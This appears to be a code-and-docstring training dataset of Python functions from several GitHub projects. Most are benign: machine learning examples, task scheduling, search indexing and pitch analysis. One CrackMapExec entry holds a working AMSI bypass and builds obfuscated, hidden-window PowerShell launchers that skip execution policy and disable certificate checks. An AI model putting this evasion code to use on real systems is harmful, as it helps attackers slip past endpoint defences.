"classification_categories", ":", "handler", ".", "handle_classification_category", "(", "cat", ")", "for", "classificationist", "in", "cable", ".", "classificationists", ":", "handler", ".", "handle_classificationist", "(", "classificationist", ")", "for", "signer", "in", "cable", ".", "signers", ":", "handler", ".", "handle_signer", "(", "signer", ")", "for", "tag", "in", "cable", ".", "tags", ":", "handler", ".", "handle_tag", "(", "tag", ")", "for", "iri", "in", "cable", ".", "media_uris", ":", "handler", ".", "handle_media_iri", "(", "iri", ")", "for", "rec", "in", "cable", ".", "recipients", ":", "handler", ".", "handle_recipient", "(", "rec", ")", "for", "rec", "in", "cable", ".", "info_recipients", ":", "handler", ".", "handle_info_recipient", "(", "rec", ")", "for", "ref", "in", "cable", ".", "references", ":", "handler", ".", "handle_reference", "(", "ref", ")", "handler", ".", "end_cable", "(", ")", "if", "standalone", ":", "handler", ".", "end", "(", ")" ]
\ Emits event from the provided `cable` to the handler. `cable` A cable object. `handler` A ICableHandler instance. `standalone` Indicates if a `start` and `end` event should be issued (default: ``True``). If `standalone` is set to ``False``, no ``handler.start()`` and ``handler.end()`` event will be issued.
[ "\\", "Emits", "event", "from", "the", "provided", "cable", "to", "the", "handler", "." ]
python
train
35.564516
apache/incubator-mxnet
example/svrg_module/api_usage_example/example_inference.py
https://github.com/apache/incubator-mxnet/blob/1af29e9c060a4c7d60eeaacba32afdb9a7775ba7/example/svrg_module/api_usage_example/example_inference.py#L64-L91
def create_network(batch_size, update_freq): """Create a linear regression network for performing SVRG optimization. :return: an instance of mx.io.NDArrayIter :return: an instance of mx.mod.svrgmodule for performing SVRG optimization """ head = '%(asctime)-15s %(message)s' logging.basicConfig(level=logging.INFO, format=head) data = np.random.randint(1, 5, [1000, 2]) #Test_Train data split n_train = int(data.shape[0] * 0.8) weights = np.array([1.0, 2.0]) label = data.dot(weights) di = mx.io.NDArrayIter(data[:n_train, :], label[:n_train], batch_size=batch_size, shuffle=True, label_name='lin_reg_label') val_iter = mx.io.NDArrayIter(data[n_train:, :], label[n_train:], batch_size=batch_size) X = mx.sym.Variable('data') Y = mx.symbol.Variable('lin_reg_label') fully_connected_layer = mx.sym.FullyConnected(data=X, name='fc1', num_hidden=1) lro = mx.sym.LinearRegressionOutput(data=fully_connected_layer, label=Y, name="lro") mod = SVRGModule( symbol=lro, data_names=['data'], label_names=['lin_reg_label'], update_freq=update_freq, logger=logging) return di, val_iter, mod
[ "def", "create_network", "(", "batch_size", ",", "update_freq", ")", ":", "head", "=", "'%(asctime)-15s %(message)s'", "logging", ".", "basicConfig", "(", "level", "=", "logging", ".", "INFO", ",", "format", "=", "head", ")", "data", "=", "np", ".", "random", ".", "randint", "(", "1", ",", "5", ",", "[", "1000", ",", "2", "]", ")", "#Test_Train data split", "n_train", "=", "int", "(", "data", ".", "shape", "[", "0", "]", "*", "0.8", ")", "weights", "=", "np", ".", "array", "(", "[", "1.0", ",", "2.0", "]", ")", "label", "=", "data", ".", "dot", "(", "weights", ")", "di", "=", "mx", ".", "io", ".", "NDArrayIter", "(", "data", "[", ":", "n_train", ",", ":", "]", ",", "label", "[", ":", "n_train", "]", ",", "batch_size", "=", "batch_size", ",", "shuffle", "=", "True", ",", "label_name", "=", "'lin_reg_label'", ")", "val_iter", "=", "mx", ".", "io", ".", "NDArrayIter", "(", "data", "[", "n_train", ":", ",", ":", "]", ",", "label", "[", "n_train", ":", "]", ",", "batch_size", "=", "batch_size", ")", "X", "=", "mx", ".", "sym", ".", "Variable", "(", "'data'", ")", "Y", "=", "mx", ".", "symbol", ".", "Variable", "(", "'lin_reg_label'", ")", "fully_connected_layer", "=", "mx", ".", "sym", ".", "FullyConnected", "(", "data", "=", "X", ",", "name", "=", "'fc1'", ",", "num_hidden", "=", "1", ")", "lro", "=", "mx", ".", "sym", ".", "LinearRegressionOutput", "(", "data", "=", "fully_connected_layer", ",", "label", "=", "Y", ",", "name", "=", "\"lro\"", ")", "mod", "=", "SVRGModule", "(", "symbol", "=", "lro", ",", "data_names", "=", "[", "'data'", "]", ",", "label_names", "=", "[", "'lin_reg_label'", "]", ",", "update_freq", "=", "update_freq", ",", "logger", "=", "logging", ")", "return", "di", ",", "val_iter", ",", "mod" ]
Create a linear regression network for performing SVRG optimization. :return: an instance of mx.io.NDArrayIter :return: an instance of mx.mod.svrgmodule for performing SVRG optimization
[ "Create", "a", "linear", "regression", "network", "for", "performing", "SVRG", "optimization", ".", ":", "return", ":", "an", "instance", "of", "mx", ".", "io", ".", "NDArrayIter", ":", "return", ":", "an", "instance", "of", "mx", ".", "mod", ".", "svrgmodule", "for", "performing", "SVRG", "optimization" ]
python
train
41.214286
thieman/dagobah
dagobah/core/core.py
https://github.com/thieman/dagobah/blob/e624180c2291034960302c9e0b818b65b5a7ee11/dagobah/core/core.py#L550-L579
def _complete_task(self, task_name, **kwargs): """ Marks this task as completed. Kwargs are stored in the run log. """ logger.debug('Job {0} marking task {1} as completed'.format(self.name, task_name)) self.run_log['tasks'][task_name] = kwargs for node in self.downstream(task_name, self.snapshot): self._start_if_ready(node) try: self.backend.acquire_lock() self._commit_run_log() except: logger.exception("Error in handling events.") finally: self.backend.release_lock() if kwargs.get('success', None) == False: task = self.tasks[task_name] try: self.backend.acquire_lock() if self.event_handler: self.event_handler.emit('task_failed', task._serialize(include_run_logs=True)) except: logger.exception("Error in handling events.") finally: self.backend.release_lock() self._on_completion()
[ "def", "_complete_task", "(", "self", ",", "task_name", ",", "*", "*", "kwargs", ")", ":", "logger", ".", "debug", "(", "'Job {0} marking task {1} as completed'", ".", "format", "(", "self", ".", "name", ",", "task_name", ")", ")", "self", ".", "run_log", "[", "'tasks'", "]", "[", "task_name", "]", "=", "kwargs", "for", "node", "in", "self", ".", "downstream", "(", "task_name", ",", "self", ".", "snapshot", ")", ":", "self", ".", "_start_if_ready", "(", "node", ")", "try", ":", "self", ".", "backend", ".", "acquire_lock", "(", ")", "self", ".", "_commit_run_log", "(", ")", "except", ":", "logger", ".", "exception", "(", "\"Error in handling events.\"", ")", "finally", ":", "self", ".", "backend", ".", "release_lock", "(", ")", "if", "kwargs", ".", "get", "(", "'success'", ",", "None", ")", "==", "False", ":", "task", "=", "self", ".", "tasks", "[", "task_name", "]", "try", ":", "self", ".", "backend", ".", "acquire_lock", "(", ")", "if", "self", ".", "event_handler", ":", "self", ".", "event_handler", ".", "emit", "(", "'task_failed'", ",", "task", ".", "_serialize", "(", "include_run_logs", "=", "True", ")", ")", "except", ":", "logger", ".", "exception", "(", "\"Error in handling events.\"", ")", "finally", ":", "self", ".", "backend", ".", "release_lock", "(", ")", "self", ".", "_on_completion", "(", ")" ]
Marks this task as completed. Kwargs are stored in the run log.
[ "Marks", "this", "task", "as", "completed", ".", "Kwargs", "are", "stored", "in", "the", "run", "log", "." ]
python
train
35.8
byt3bl33d3r/CrackMapExec
cme/helpers/powershell.py
https://github.com/byt3bl33d3r/CrackMapExec/blob/333f1c4e06884e85b2776459963ef85d182aba8e/cme/helpers/powershell.py#L70-L154
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False): amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} """ if force_ps32: command = amsi_bypass + """ $functions = {{ function Command-ToExecute {{ {command} }} }} if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {{ $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32 $job | Wait-Job }} else {{ IEX "$functions" Command-ToExecute }} """.format(command=amsi_bypass + ps_command) else: command = amsi_bypass + ps_command logging.debug('Generated PS command:\n {}\n'.format(command)) # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently # it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this # it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3 """ if is_powershell_installed(): temp = tempfile.NamedTemporaryFile(prefix='cme_', suffix='.ps1', dir='/tmp') temp.write(command) temp.read() encoding_types = [1,2,3,4,5,6] while True: encoding = random.choice(encoding_types) invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), temp.name, encoding) logging.debug(invoke_obfs_command) out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) logging.debug('Command length: {}'.format(len(command))) if len(command) <= 8192: temp.close() break encoding_types.remove(encoding) else: """ if not dont_obfs: obfs_attempts = 0 while True: command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"' if len(command) <= 8191: break if obfs_attempts == 4: logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command))) exit(1) obfs_attempts += 1 else: command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command)) if len(command) > 8191: logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command))) exit(1) return command
[ "def", "create_ps_command", "(", "ps_command", ",", "force_ps32", "=", "False", ",", "dont_obfs", "=", "False", ")", ":", "amsi_bypass", "=", "\"\"\"[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\ntry{\n[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)\n}catch{}\n\"\"\"", "if", "force_ps32", ":", "command", "=", "amsi_bypass", "+", "\"\"\"\n$functions = {{\n function Command-ToExecute\n {{\n{command}\n }}\n}}\nif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\n{{\n $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32\n $job | Wait-Job\n}}\nelse\n{{\n IEX \"$functions\"\n Command-ToExecute\n}}\n\"\"\"", ".", "format", "(", "command", "=", "amsi_bypass", "+", "ps_command", ")", "else", ":", "command", "=", "amsi_bypass", "+", "ps_command", "logging", ".", "debug", "(", "'Generated PS command:\\n {}\\n'", ".", "format", "(", "command", ")", ")", "# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently", "# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this ", "# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3", "if", "not", "dont_obfs", ":", "obfs_attempts", "=", "0", "while", "True", ":", "command", "=", "'powershell.exe -exec bypass -noni -nop -w 1 -C \"'", "+", "invoke_obfuscation", "(", "command", ")", "+", "'\"'", "if", "len", "(", "command", ")", "<=", "8191", ":", "break", "if", "obfs_attempts", "==", "4", ":", "logger", ".", "error", "(", "'Command exceeds maximum length of 8191 chars (was {}). exiting.'", ".", "format", "(", "len", "(", "command", ")", ")", ")", "exit", "(", "1", ")", "obfs_attempts", "+=", "1", "else", ":", "command", "=", "'powershell.exe -noni -nop -w 1 -enc {}'", ".", "format", "(", "encode_ps_command", "(", "command", ")", ")", "if", "len", "(", "command", ")", ">", "8191", ":", "logger", ".", "error", "(", "'Command exceeds maximum length of 8191 chars (was {}). exiting.'", ".", "format", "(", "len", "(", "command", ")", ")", ")", "exit", "(", "1", ")", "return", "command" ]
if is_powershell_installed(): temp = tempfile.NamedTemporaryFile(prefix='cme_', suffix='.ps1', dir='/tmp') temp.write(command) temp.read() encoding_types = [1,2,3,4,5,6] while True: encoding = random.choice(encoding_types) invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), temp.name, encoding) logging.debug(invoke_obfs_command) out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) logging.debug('Command length: {}'.format(len(command))) if len(command) <= 8192: temp.close() break encoding_types.remove(encoding) else:
[ "if", "is_powershell_installed", "()", ":" ]
python
train
37.894118
jeffknupp/sandman
sandman/sandmanctl.py
https://github.com/jeffknupp/sandman/blob/253ea4d15cbccd9f0016d66fedd7478614cc0b2f/sandman/sandmanctl.py#L35-L44
def run(generate_pks, show_pks, host, port, uri): """Connect sandman to <URI> and start the API server/admin interface.""" app.config['SQLALCHEMY_DATABASE_URI'] = uri app.config['SANDMAN_GENERATE_PKS'] = generate_pks app.config['SANDMAN_SHOW_PKS'] = show_pks app.config['SERVER_HOST'] = host app.config['SERVER_PORT'] = port activate(name='sandmanctl') app.run(host=host, port=int(port), debug=True)
[ "def", "run", "(", "generate_pks", ",", "show_pks", ",", "host", ",", "port", ",", "uri", ")", ":", "app", ".", "config", "[", "'SQLALCHEMY_DATABASE_URI'", "]", "=", "uri", "app", ".", "config", "[", "'SANDMAN_GENERATE_PKS'", "]", "=", "generate_pks", "app", ".", "config", "[", "'SANDMAN_SHOW_PKS'", "]", "=", "show_pks", "app", ".", "config", "[", "'SERVER_HOST'", "]", "=", "host", "app", ".", "config", "[", "'SERVER_PORT'", "]", "=", "port", "activate", "(", "name", "=", "'sandmanctl'", ")", "app", ".", "run", "(", "host", "=", "host", ",", "port", "=", "int", "(", "port", ")", ",", "debug", "=", "True", ")" ]
Connect sandman to <URI> and start the API server/admin interface.
[ "Connect", "sandman", "to", "<URI", ">", "and", "start", "the", "API", "server", "/", "admin", "interface", "." ]
python
train
42.6
pyblish/pyblish-maya
pyblish_maya/lib.py
https://github.com/pyblish/pyblish-maya/blob/75db8b5d8de9d53ae95e74195a788b5f6db2cb5f/pyblish_maya/lib.py#L134-L156
def add_to_filemenu(): """Add Pyblish to file-menu .. note:: We're going a bit hacky here, probably due to my lack of understanding for `evalDeferred` or `executeDeferred`, so if you can think of a better solution, feel free to edit. """ if hasattr(cmds, 'about') and not cmds.about(batch=True): # As Maya builds its menus dynamically upon being accessed, # we force its build here prior to adding our entry using it's # native mel function call. mel.eval("evalDeferred buildFileMenu") # Serialise function into string script = inspect.getsource(_add_to_filemenu) script += "\n_add_to_filemenu()" # If cmds doesn't have any members, we're most likely in an # uninitialized batch-mode. It it does exists, ensure we # really aren't in batch mode. cmds.evalDeferred(script)
[ "def", "add_to_filemenu", "(", ")", ":", "if", "hasattr", "(", "cmds", ",", "'about'", ")", "and", "not", "cmds", ".", "about", "(", "batch", "=", "True", ")", ":", "# As Maya builds its menus dynamically upon being accessed,", "# we force its build here prior to adding our entry using it's", "# native mel function call.", "mel", ".", "eval", "(", "\"evalDeferred buildFileMenu\"", ")", "# Serialise function into string", "script", "=", "inspect", ".", "getsource", "(", "_add_to_filemenu", ")", "script", "+=", "\"\\n_add_to_filemenu()\"", "# If cmds doesn't have any members, we're most likely in an", "# uninitialized batch-mode. It it does exists, ensure we", "# really aren't in batch mode.", "cmds", ".", "evalDeferred", "(", "script", ")" ]
Add Pyblish to file-menu .. note:: We're going a bit hacky here, probably due to my lack of understanding for `evalDeferred` or `executeDeferred`, so if you can think of a better solution, feel free to edit.
[ "Add", "Pyblish", "to", "file", "-", "menu" ]
python
test
37.956522
JarryShaw/PyPCAPKit
src/foundation/extraction.py
https://github.com/JarryShaw/PyPCAPKit/blob/c7f0da9aebc2cf210bf8f8b912f7d3cbb98ca10e/src/foundation/extraction.py#L1015-L1082
def _run_server(self, multiprocessing): """Use server multiprocessing to extract PCAP files.""" if not self._flag_m: raise UnsupportedCall(f"Extractor(engine={self._exeng})' has no attribute '_run_server'") if not self._flag_q: self._flag_q = True warnings.warn("'Extractor(engine=pipeline)' does not support output; " f"'fout={self._ofnm}' ignored", AttributeWarning, stacklevel=stacklevel()) self._frnum = 1 # frame number (revised) self._expkg = multiprocessing # multiprocessing module self._mpsvc = NotImplemented # multiprocessing server process self._mpprc = list() # multiprocessing process list self._mpfdp = collections.defaultdict(multiprocessing.Queue) # multiprocessing file pointer self._mpmng = multiprocessing.Manager() # multiprocessing manager self._mpbuf = self._mpmng.dict() # multiprocessing frame dict self._mpfrm = self._mpmng.list() # multiprocessing frame storage self._mprsm = self._mpmng.list() # multiprocessing reassembly buffer self._mpkit = self._mpmng.Namespace() # multiprocessing work kit self._mpkit.counter = 0 # work count (on duty) self._mpkit.pool = 1 # work pool (ready) self._mpkit.eof = False # EOF flag self._mpkit.trace = None # flow tracer # preparation self.record_header() self._mpfdp[0].put(self._gbhdr.length) self._mpsvc = multiprocessing.Process( target=self._server_analyse_frame, kwargs={'mpfrm': self._mpfrm, 'mprsm': self._mprsm, 'mpbuf': self._mpbuf, 'mpkit': self._mpkit} ) self._mpsvc.start() # extraction while True: # check EOF if self._mpkit.eof: self._update_eof() break # check counter if self._mpkit.pool and self._mpkit.counter < CPU_CNT - 1: # update file offset self._ifile.seek(self._mpfdp.pop(self._frnum-1).get(), os.SEEK_SET) # create worker # print(self._frnum, 'start') proc = multiprocessing.Process( target=self._server_extract_frame, kwargs={'mpkit': self._mpkit, 'mpbuf': self._mpbuf, 'mpfdp': self._mpfdp[self._frnum]} ) # update status self._mpkit.pool -= 1 self._mpkit.counter += 1 # start and record proc.start() self._frnum += 1 self._mpprc.append(proc) # check buffer if len(self._mpprc) >= CPU_CNT - 1: [proc.join() for proc in self._mpprc[:-4]] del self._mpprc[:-4]
[ "def", "_run_server", "(", "self", ",", "multiprocessing", ")", ":", "if", "not", "self", ".", "_flag_m", ":", "raise", "UnsupportedCall", "(", "f\"Extractor(engine={self._exeng})' has no attribute '_run_server'\"", ")", "if", "not", "self", ".", "_flag_q", ":", "self", ".", "_flag_q", "=", "True", "warnings", ".", "warn", "(", "\"'Extractor(engine=pipeline)' does not support output; \"", "f\"'fout={self._ofnm}' ignored\"", ",", "AttributeWarning", ",", "stacklevel", "=", "stacklevel", "(", ")", ")", "self", ".", "_frnum", "=", "1", "# frame number (revised)", "self", ".", "_expkg", "=", "multiprocessing", "# multiprocessing module", "self", ".", "_mpsvc", "=", "NotImplemented", "# multiprocessing server process", "self", ".", "_mpprc", "=", "list", "(", ")", "# multiprocessing process list", "self", ".", "_mpfdp", "=", "collections", ".", "defaultdict", "(", "multiprocessing", ".", "Queue", ")", "# multiprocessing file pointer", "self", ".", "_mpmng", "=", "multiprocessing", ".", "Manager", "(", ")", "# multiprocessing manager", "self", ".", "_mpbuf", "=", "self", ".", "_mpmng", ".", "dict", "(", ")", "# multiprocessing frame dict", "self", ".", "_mpfrm", "=", "self", ".", "_mpmng", ".", "list", "(", ")", "# multiprocessing frame storage", "self", ".", "_mprsm", "=", "self", ".", "_mpmng", ".", "list", "(", ")", "# multiprocessing reassembly buffer", "self", ".", "_mpkit", "=", "self", ".", "_mpmng", ".", "Namespace", "(", ")", "# multiprocessing work kit", "self", ".", "_mpkit", ".", "counter", "=", "0", "# work count (on duty)", "self", ".", "_mpkit", ".", "pool", "=", "1", "# work pool (ready)", "self", ".", "_mpkit", ".", "eof", "=", "False", "# EOF flag", "self", ".", "_mpkit", ".", "trace", "=", "None", "# flow tracer", "# preparation", "self", ".", "record_header", "(", ")", "self", ".", "_mpfdp", "[", "0", "]", ".", "put", "(", "self", ".", "_gbhdr", ".", "length", ")", "self", ".", "_mpsvc", "=", "multiprocessing", ".", "Process", "(", "target", "=", "self", ".", "_server_analyse_frame", ",", "kwargs", "=", "{", "'mpfrm'", ":", "self", ".", "_mpfrm", ",", "'mprsm'", ":", "self", ".", "_mprsm", ",", "'mpbuf'", ":", "self", ".", "_mpbuf", ",", "'mpkit'", ":", "self", ".", "_mpkit", "}", ")", "self", ".", "_mpsvc", ".", "start", "(", ")", "# extraction", "while", "True", ":", "# check EOF", "if", "self", ".", "_mpkit", ".", "eof", ":", "self", ".", "_update_eof", "(", ")", "break", "# check counter", "if", "self", ".", "_mpkit", ".", "pool", "and", "self", ".", "_mpkit", ".", "counter", "<", "CPU_CNT", "-", "1", ":", "# update file offset", "self", ".", "_ifile", ".", "seek", "(", "self", ".", "_mpfdp", ".", "pop", "(", "self", ".", "_frnum", "-", "1", ")", ".", "get", "(", ")", ",", "os", ".", "SEEK_SET", ")", "# create worker", "# print(self._frnum, 'start')", "proc", "=", "multiprocessing", ".", "Process", "(", "target", "=", "self", ".", "_server_extract_frame", ",", "kwargs", "=", "{", "'mpkit'", ":", "self", ".", "_mpkit", ",", "'mpbuf'", ":", "self", ".", "_mpbuf", ",", "'mpfdp'", ":", "self", ".", "_mpfdp", "[", "self", ".", "_frnum", "]", "}", ")", "# update status", "self", ".", "_mpkit", ".", "pool", "-=", "1", "self", ".", "_mpkit", ".", "counter", "+=", "1", "# start and record", "proc", ".", "start", "(", ")", "self", ".", "_frnum", "+=", "1", "self", ".", "_mpprc", ".", "append", "(", "proc", ")", "# check buffer", "if", "len", "(", "self", ".", "_mpprc", ")", ">=", "CPU_CNT", "-", "1", ":", "[", "proc", ".", "join", "(", ")", "for", "proc", "in", "self", ".", "_mpprc", "[", ":", "-", "4", "]", "]", "del", "self", ".", "_mpprc", "[", ":", "-", "4", "]" ]
Use server multiprocessing to extract PCAP files.
[ "Use", "server", "multiprocessing", "to", "extract", "PCAP", "files", "." ]
python
train
47.647059
algolia/algoliasearch-django
algoliasearch_django/models.py
https://github.com/algolia/algoliasearch-django/blob/ca219db41eb56bdd1c0389cdc1508a41698958d7/algoliasearch_django/models.py#L251-L282
def _should_really_index(self, instance): """Return True if according to should_index the object should be indexed.""" if self._should_index_is_method: is_method = inspect.ismethod(self.should_index) try: count_args = len(inspect.signature(self.should_index).parameters) except AttributeError: # noinspection PyDeprecation count_args = len(inspect.getargspec(self.should_index).args) if is_method or count_args is 1: # bound method, call with instance return self.should_index(instance) else: # unbound method, simply call without arguments return self.should_index() else: # property/attribute/Field, evaluate as bool attr_type = type(self.should_index) if attr_type is DeferredAttribute: attr_value = self.should_index.__get__(instance, None) elif attr_type is str: attr_value = getattr(instance, self.should_index) elif attr_type is property: attr_value = self.should_index.__get__(instance) else: raise AlgoliaIndexError('{} should be a boolean attribute or a method that returns a boolean.'.format( self.should_index)) if type(attr_value) is not bool: raise AlgoliaIndexError("%s's should_index (%s) should be a boolean" % ( instance.__class__.__name__, self.should_index)) return attr_value
[ "def", "_should_really_index", "(", "self", ",", "instance", ")", ":", "if", "self", ".", "_should_index_is_method", ":", "is_method", "=", "inspect", ".", "ismethod", "(", "self", ".", "should_index", ")", "try", ":", "count_args", "=", "len", "(", "inspect", ".", "signature", "(", "self", ".", "should_index", ")", ".", "parameters", ")", "except", "AttributeError", ":", "# noinspection PyDeprecation", "count_args", "=", "len", "(", "inspect", ".", "getargspec", "(", "self", ".", "should_index", ")", ".", "args", ")", "if", "is_method", "or", "count_args", "is", "1", ":", "# bound method, call with instance", "return", "self", ".", "should_index", "(", "instance", ")", "else", ":", "# unbound method, simply call without arguments", "return", "self", ".", "should_index", "(", ")", "else", ":", "# property/attribute/Field, evaluate as bool", "attr_type", "=", "type", "(", "self", ".", "should_index", ")", "if", "attr_type", "is", "DeferredAttribute", ":", "attr_value", "=", "self", ".", "should_index", ".", "__get__", "(", "instance", ",", "None", ")", "elif", "attr_type", "is", "str", ":", "attr_value", "=", "getattr", "(", "instance", ",", "self", ".", "should_index", ")", "elif", "attr_type", "is", "property", ":", "attr_value", "=", "self", ".", "should_index", ".", "__get__", "(", "instance", ")", "else", ":", "raise", "AlgoliaIndexError", "(", "'{} should be a boolean attribute or a method that returns a boolean.'", ".", "format", "(", "self", ".", "should_index", ")", ")", "if", "type", "(", "attr_value", ")", "is", "not", "bool", ":", "raise", "AlgoliaIndexError", "(", "\"%s's should_index (%s) should be a boolean\"", "%", "(", "instance", ".", "__class__", ".", "__name__", ",", "self", ".", "should_index", ")", ")", "return", "attr_value" ]
Return True if according to should_index the object should be indexed.
[ "Return", "True", "if", "according", "to", "should_index", "the", "object", "should", "be", "indexed", "." ]
python
valid
49.3125
gopalkoduri/intonation
intonation/pitch.py
https://github.com/gopalkoduri/intonation/blob/7f50d2b572755840be960ea990416a7b27f20312/intonation/pitch.py#L79-L180
def fit_lines(self, window=1500, break_thresh=1500): """ Fits lines to pitch contours. :param window: size of each chunk to which linear equation is to be fit (in milliseconds). To keep it simple, hop is chosen to be one third of the window. :param break_thresh: If there is silence beyond this limit (in milliseconds), the contour will be broken there into two so that we don't fit a line over and including the silent region. """ window /= 1000 hop = window/3 break_thresh /= 1000 #cut the whole song into pieces if there are gaps more than break_thresh seconds i = 0 break_indices = [] count = 0 while i < len(self.pitch): if self.pitch[i] == -10000: count = 1 start_index = i while i < len(self.pitch) and self.pitch[i] == -10000: count += 1 i += 1 end_index = i-1 if self.timestamps[end_index]-self.timestamps[start_index] >= break_thresh: break_indices.append([start_index, end_index]) i += 1 break_indices = np.array(break_indices) #In creating the data blocks which are not silences, note that we # take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...] # is break_indices, we take e1-s2, e2-s3 chunks and build data blocks data_blocks = [] if len(break_indices) == 0: t_pitch = self.pitch.reshape(len(self.pitch), 1) t_timestamps = self.timestamps.reshape(len(self.timestamps), 1) data_blocks = [np.append(t_timestamps, t_pitch, axis=1)] else: if break_indices[0, 0] != 0: t_pitch = self.pitch[:break_indices[0, 0]] t_pitch = t_pitch.reshape(len(t_pitch), 1) t_timestamps = self.timestamps[:break_indices[0, 0]] t_timestamps = t_timestamps.reshape(len(t_timestamps), 1) data_blocks.append(np.append(t_timestamps, t_pitch, axis=1)) block_start = break_indices[0, 1] for i in xrange(1, len(break_indices)): block_end = break_indices[i, 0] t_pitch = self.pitch[block_start:block_end] t_pitch = t_pitch.reshape(len(t_pitch), 1) t_timestamps = self.timestamps[block_start:block_end] t_timestamps = t_timestamps.reshape(len(t_timestamps), 1) data_blocks.append(np.append(t_timestamps, t_pitch, axis=1)) block_start = break_indices[i, 1] if block_start != len(self.pitch)-1: t_pitch = self.pitch[block_start:] t_pitch = t_pitch.reshape(len(t_pitch), 1) t_timestamps = self.timestamps[block_start:] t_timestamps = t_timestamps.reshape(len(t_timestamps), 1) data_blocks.append(np.append(t_timestamps, t_pitch, axis=1)) label_start_offset = (window-hop)/2 label_end_offset = label_start_offset+hop #dataNew = np.zeros_like(data) #dataNew[:, 0] = data[:, 0] data_new = np.array([[0, 0]]) for data in data_blocks: start_index = 0 while start_index < len(data)-1: end_index = utils.find_nearest_index(data[:, 0], data[start_index][0]+window) segment = data[start_index:end_index] if len(segment) == 0: start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop) continue segment_clean = np.delete(segment, np.where(segment[:, 1] == -10000), axis=0) if len(segment_clean) == 0: #After splitting into blocks, this loop better not come into play #raise ValueError("This part of the block is absolute silence! Make sure block_thresh >= window!") start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop) continue n_clean = len(segment_clean) x_clean = np.matrix(segment_clean[:, 0]).reshape(n_clean, 1) y_clean = np.matrix(segment_clean[:, 1]).reshape(n_clean, 1) #return [x_clean, y_clean] theta = utils.normal_equation(x_clean, y_clean) #determine the start and end of the segment to be labelled label_start_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_start_offset) label_end_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_end_offset) x_clean = x_clean[label_start_index:label_end_index] #return x_clean x_clean = np.insert(x_clean, 0, np.ones(len(x_clean)), axis=1) newy = x_clean*theta result = np.append(x_clean[:, 1], newy, axis=1) data_new = np.append(data_new, result, axis=0) start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop) return [data_new[:, 0], data_new[:, 1]]
[ "def", "fit_lines", "(", "self", ",", "window", "=", "1500", ",", "break_thresh", "=", "1500", ")", ":", "window", "/=", "1000", "hop", "=", "window", "/", "3", "break_thresh", "/=", "1000", "#cut the whole song into pieces if there are gaps more than break_thresh seconds", "i", "=", "0", "break_indices", "=", "[", "]", "count", "=", "0", "while", "i", "<", "len", "(", "self", ".", "pitch", ")", ":", "if", "self", ".", "pitch", "[", "i", "]", "==", "-", "10000", ":", "count", "=", "1", "start_index", "=", "i", "while", "i", "<", "len", "(", "self", ".", "pitch", ")", "and", "self", ".", "pitch", "[", "i", "]", "==", "-", "10000", ":", "count", "+=", "1", "i", "+=", "1", "end_index", "=", "i", "-", "1", "if", "self", ".", "timestamps", "[", "end_index", "]", "-", "self", ".", "timestamps", "[", "start_index", "]", ">=", "break_thresh", ":", "break_indices", ".", "append", "(", "[", "start_index", ",", "end_index", "]", ")", "i", "+=", "1", "break_indices", "=", "np", ".", "array", "(", "break_indices", ")", "#In creating the data blocks which are not silences, note that we", "# take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...]", "# is break_indices, we take e1-s2, e2-s3 chunks and build data blocks", "data_blocks", "=", "[", "]", "if", "len", "(", "break_indices", ")", "==", "0", ":", "t_pitch", "=", "self", ".", "pitch", ".", "reshape", "(", "len", "(", "self", ".", "pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", ".", "reshape", "(", "len", "(", "self", ".", "timestamps", ")", ",", "1", ")", "data_blocks", "=", "[", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", "]", "else", ":", "if", "break_indices", "[", "0", ",", "0", "]", "!=", "0", ":", "t_pitch", "=", "self", ".", "pitch", "[", ":", "break_indices", "[", "0", ",", "0", "]", "]", "t_pitch", "=", "t_pitch", ".", "reshape", "(", "len", "(", "t_pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", "[", ":", "break_indices", "[", "0", ",", "0", "]", "]", "t_timestamps", "=", "t_timestamps", ".", 